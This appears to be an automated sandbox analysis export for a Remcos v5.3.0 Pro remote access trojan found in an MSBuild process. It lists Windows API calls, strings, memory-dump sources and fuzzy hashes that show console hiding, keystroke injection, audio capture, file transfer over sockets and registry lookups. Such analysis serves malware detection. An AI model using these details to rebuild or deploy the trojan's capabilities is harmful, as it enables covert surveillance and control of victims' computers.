                                                                                                                                                                                    • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                                                                                                                    • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                                    • String ID: Remcos
                                                                                                                                                                                    • API String ID: 1970332568-165870891
                                                                                                                                                                                    • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                    • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: aedd147e534ec43f5761457850892578a0c13fdb57cd67c13296e0f558563f7f
                                                                                                                                                                                    • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                                                                                                                    • Opcode Fuzzy Hash: aedd147e534ec43f5761457850892578a0c13fdb57cd67c13296e0f558563f7f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCPInfo.KERNEL32(?,?), ref: 00452BD6
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C59
                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CEC
                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D03
                                                                                                                                                                                      • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D7F
                                                                                                                                                                                    • __freea.LIBCMT ref: 00452DAA
                                                                                                                                                                                    • __freea.LIBCMT ref: 00452DB6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 201697637-0
                                                                                                                                                                                    • Opcode ID: 8207d679c22cf9b950034297f63c5325b95f4d680d22b2c299b3b752f487d9df
                                                                                                                                                                                    • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8207d679c22cf9b950034297f63c5325b95f4d680d22b2c299b3b752f487d9df
                                                                                                                                                                                    • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1454806937-0
                                                                                                                                                                                    • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                    • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                                                                    • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                                      • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                      • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                                      • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                                                                                                    • _free.LIBCMT ref: 00444714
                                                                                                                                                                                    • _free.LIBCMT ref: 0044472D
                                                                                                                                                                                    • _free.LIBCMT ref: 0044475F
                                                                                                                                                                                    • _free.LIBCMT ref: 00444768
                                                                                                                                                                                    • _free.LIBCMT ref: 00444774
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                    • String ID: C
                                                                                                                                                                                    • API String ID: 1679612858-1037565863
                                                                                                                                                                                    • Opcode ID: 25980d4fb1d1aa278fce83e1ff95ed9ec8adbec6312d6cd30ab1b2f020318a8d
                                                                                                                                                                                    • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                                                                                                                    • Opcode Fuzzy Hash: 25980d4fb1d1aa278fce83e1ff95ed9ec8adbec6312d6cd30ab1b2f020318a8d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: tcp$udp
                                                                                                                                                                                    • API String ID: 0-3725065008
                                                                                                                                                                                    • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                                                                                    • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                                                                                                                    • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                    • String ID: gKE$HE$HE
                                                                                                                                                                                    • API String ID: 269201875-2777690135
                                                                                                                                                                                    • Opcode ID: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                                                                                                                                    • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                                                                                                                    • Opcode Fuzzy Hash: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                                                                                                                                    • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                                                                                      • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                                                                                      • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                                                                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                                                                                      • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                                                                                      • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                                                                                      • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                                    • String ID: T=G$p[G$>G$>G
                                                                                                                                                                                    • API String ID: 1596592924-2461731529
                                                                                                                                                                                    • Opcode ID: 7df825261aaa4c9beefe6a93152f9594a6397925b7a728083938fa5b6e018b5b
                                                                                                                                                                                    • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7df825261aaa4c9beefe6a93152f9594a6397925b7a728083938fa5b6e018b5b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002E0,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                                                                                      • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                                                                                      • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                                                    • String ID: .part
                                                                                                                                                                                    • API String ID: 1303771098-3499674018
                                                                                                                                                                                    • Opcode ID: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                                                                                                    • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                                                                                                                    • Opcode Fuzzy Hash: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                                                                                                      • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                                                                                      • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                                                                                      • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                                                                                      • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0041A8F6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                                                                    • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                                                    • API String ID: 3286818993-703403762
                                                                                                                                                                                    • Opcode ID: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                                                                                                    • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                                                                                                                                    • Opcode Fuzzy Hash: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                                                                                                                    • GetConsoleWindow.KERNEL32 ref: 0041BEBF
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                                                                                                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Console$Window$AllocOutputShow
                                                                                                                                                                                    • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                                                                                                    • API String ID: 4067487056-2527699604
                                                                                                                                                                                    • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                                                                                                    • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                                                                                                                    • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                                                                                                                    • __freea.LIBCMT ref: 00449B37
                                                                                                                                                                                      • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                                                                    • __freea.LIBCMT ref: 00449B40
                                                                                                                                                                                    • __freea.LIBCMT ref: 00449B65
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3864826663-0
                                                                                                                                                                                    • Opcode ID: 8c8a116705a4c2baf122adee4ab18fb9808afdf9de7dcd7dac8e0bc8768b82ee
                                                                                                                                                                                    • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c8a116705a4c2baf122adee4ab18fb9808afdf9de7dcd7dac8e0bc8768b82ee
                                                                                                                                                                                    • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendInput.USER32 ref: 00418B08
                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                                                                                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                                                                                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                                                                                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                                                                                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                                                                                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                                                                                                                      • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InputSend$Virtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1167301434-0
                                                                                                                                                                                    • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                                                    • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                                                                                                                    • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                    • Opcode ID: 67e449e53c8ad906785535aafbfbe26c0ba071591af106f4c86beb5beaf16e94
                                                                                                                                                                                    • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                                                                                                    • Opcode Fuzzy Hash: 67e449e53c8ad906785535aafbfbe26c0ba071591af106f4c86beb5beaf16e94
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                                                                    • _free.LIBCMT ref: 00444086
                                                                                                                                                                                    • _free.LIBCMT ref: 0044409D
                                                                                                                                                                                    • _free.LIBCMT ref: 004440BC
                                                                                                                                                                                    • _free.LIBCMT ref: 004440D7
                                                                                                                                                                                    • _free.LIBCMT ref: 004440EE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$AllocateHeap
                                                                                                                                                                                    • String ID: J7D
                                                                                                                                                                                    • API String ID: 3033488037-1677391033
